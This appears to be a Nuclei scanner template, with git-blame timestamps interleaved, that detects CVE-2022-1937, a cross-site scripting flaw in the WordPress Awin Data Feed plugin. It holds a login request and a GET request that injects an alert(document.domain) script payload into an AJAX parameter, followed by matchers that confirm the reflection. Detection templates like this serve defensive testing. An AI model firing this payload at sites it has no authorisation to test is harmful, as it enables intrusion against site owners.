2022-07-27 04:55:13 +00:00
id : CVE-2022-1937
info :
2022-09-16 19:50:10 +00:00
name : WordPress Awin Data Feed <=1.6 - Cross-Site Scripting
2022-07-27 04:55:13 +00:00
author : Akincibor,DhiyaneshDK
2022-09-16 20:03:07 +00:00
severity : medium
2022-07-27 04:55:13 +00:00
description : |
2022-09-16 19:50:10 +00:00
WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users.
2022-07-27 04:55:13 +00:00
reference :
- https://wpscan.com/vulnerability/eb40ea5d-a463-4947-9a40-d55911ff50e9
- https://nvd.nist.gov/vuln/detail/CVE-2022-1937
2022-07-27 05:25:22 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-1937
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-07-27 04:55:13 +00:00
metadata :
2022-07-27 05:25:22 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,xss,awin,wpscan,wp-plugin,wp,wordpress,authenticated
2022-07-27 04:55:13 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
req-condition : true
matchers :
- type : dsl
dsl :
- 'contains(all_headers_2, "text/html")'
- 'status_code_2 == 200'
- contains(body_2, 'colspan=\"2\"><script>alert(document.domain)</script></th>')
condition : and
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14